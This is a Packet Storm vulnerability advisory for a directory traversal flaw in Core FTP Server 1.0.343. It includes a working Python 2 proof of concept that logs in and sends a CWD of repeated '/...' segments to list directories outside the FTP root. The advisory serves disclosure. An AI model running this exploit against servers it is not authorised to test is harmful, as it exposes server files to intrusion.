Core FTP Server 1.0.343 Directory Traversal

2010-05-28T00:00:00
ID PACKETSTORM:90043
Type packetstorm
Reporter AutoSec Tools
Modified 2010-05-28T00:00:00

Description

                                        
                                            `#============================================================================================================#  
# _ _ __ __ __ _______ _____ __ __ _____ _ _ _____ __ __ #  
# /_/\ /\_\ /\_\ /\_\ /\_\ /\_______)\ ) ___ ( /_/\__/\ ) ___ ( /_/\ /\_\ /\_____\/_/\__/\ #  
# ) ) )( ( ( \/_/( ( ( ( ( ( \(___ __\// /\_/\ \ ) ) ) ) )/ /\_/\ \ ) ) )( ( (( (_____/) ) ) ) ) #  
# /_/ //\\ \_\ /\_\\ \_\ \ \_\ / / / / /_/ (_\ \ /_/ /_/ // /_/ (_\ \/_/ //\\ \_\\ \__\ /_/ /_/_/ #  
# \ \ / \ / // / // / /__ / / /__ ( ( ( \ \ )_/ / / \ \ \_\/ \ \ )_/ / /\ \ / \ / // /__/_\ \ \ \ \ #  
# )_) /\ (_(( (_(( (_____(( (_____( \ \ \ \ \/_\/ / )_) ) \ \/_\/ / )_) /\ (_(( (_____\)_) ) \ \ #  
# \_\/ \/_/ \/_/ \/_____/ \/_____/ /_/_/ )_____( \_\/ )_____( \_\/ \/_/ \/_____/\_\/ \_\/ #  
# #  
#============================================================================================================#  
# #  
# Vulnerability............Directory Traversal #  
# Software.................Core FTP Server 1.0.343 #  
# Download.................http://coreftp.com/ #  
# Date.....................5/27/10 #  
# #  
#============================================================================================================#  
# #  
# Site.....................http://cross-site-scripting.blogspot.com/ #  
# Email....................john.leitch5@gmail.com #  
# #  
#============================================================================================================#  
# #  
# ##Description## #  
# #  
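# It's possible to navigate the local file system of a server running Core FTP Server 1.0.343 by using a #
# specially crafted URL. The proof of concept below sends the crafted path as the argument of an FTP CWD #
# command after logging in, and requests a directory listing only if the server answers 250. #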
# #  
# #  
# ##Exploit## #  
# #  
# /... #  
# #  
# #  
# ##Proof of Concept## #  
# #  
import sys, socket, re  
  
# Server under test and the login used for the check. The defaults point at
# a local instance and an anonymous-style account.
host, port = 'localhost', 21
user, password = 'anonymous', 'a'

# Bytes requested per recv() call, and the socket timeout in seconds.
buffer_size, timeout = 8192, 8
  
def recv(s):
    """Read from socket *s* until the peer closes it and return the data.

    Each read asks for up to ``buffer_size`` bytes; an empty read is taken
    as end of stream. A timeout or socket error raised by ``s.recv`` is not
    caught here, so it propagates to the caller and the data read so far
    is not returned.
    """
    chunks = []
    while True:
        piece = s.recv(buffer_size)
        if not piece:
            break
        chunks.append(piece)
    return ''.join(chunks)
  
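def list_root():
    """Check whether the server accepts a ``/...`` path in CWD and list it.

    Python 2 code (socket data is handled as ``str``). Logs in with the
    module-level ``user``/``password``, sends ``CWD`` with sixteen ``/...``
    segments and, only if the server answers 250, requests a passive-mode
    ``LIST`` and prints what arrives on the data connection. Every server
    reply is printed as it is received.

    Reading the output: a 250 reply to the CWD means the server accepted
    the dotted path instead of rejecting it, which is the behaviour the
    advisory reports for Core FTP Server 1.0.343. Any other reply ends the
    check without a listing. On the wire the request is recognisable as a
    CWD whose argument consists of repeated ``/...`` segments.

    Returns None. Exceptions are caught and printed, not raised; both
    sockets are closed on every exit path.
    """
    s = None
    s2 = None
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # Timeout is set before connect so the connect itself is bounded too.
        s.settimeout(timeout)
        s.connect((host, port))

        # Server banner.
        print(s.recv(buffer_size))

        s.send('USER ' + user + '\r\n')
        print(s.recv(buffer_size))

        s.send('PASS ' + password + '\r\n')
        # Two reads are issued here; presumably the login reply arrives in
        # two pieces. If the second read gets nothing before the timeout,
        # the exception handler below ends the check.
        print(s.recv(buffer_size) + s.recv(buffer_size))

        s.send('CWD ' + '/...' * 16 + '\r\n')
        resp = s.recv(buffer_size)
        print(resp)

        # Only a 250 reply (path accepted) continues to the listing.
        if resp[:3] == '250':
            s.send('PASV\r\n')
            resp = s.recv(buffer_size)
            print(resp)

            # Raw string so the \d escapes reach the regex engine unchanged.
            pasv_info = re.search(r'(\d+),(\d+),(\d+),(\d+),(\d+),(\d+)', resp)
            if pasv_info is None:
                print('Invalid PASV response: ' + resp)
                return

            s.send('LIST\r\n')

            # Data port is p1 * 256 + p2 from the PASV reply. The address
            # octets in the reply are ignored: the data connection goes to
            # the configured host.
            data_port = int(pasv_info.group(5)) * 256 + int(pasv_info.group(6))
            s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s2.settimeout(timeout)
            s2.connect((host, data_port))

            print(recv(s2))
    except Exception:
        # Best-effort script: report the failure and fall through to cleanup.
        print(sys.exc_info())
    finally:
        # The original closed only the control socket, and only on the
        # success path; close both sockets however the check ends.
        for sock in (s2, s):
            if sock is not None:
                sock.close()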
  
# Run the check once, at module load, against the host and port configured above.
list_root()
  
  
`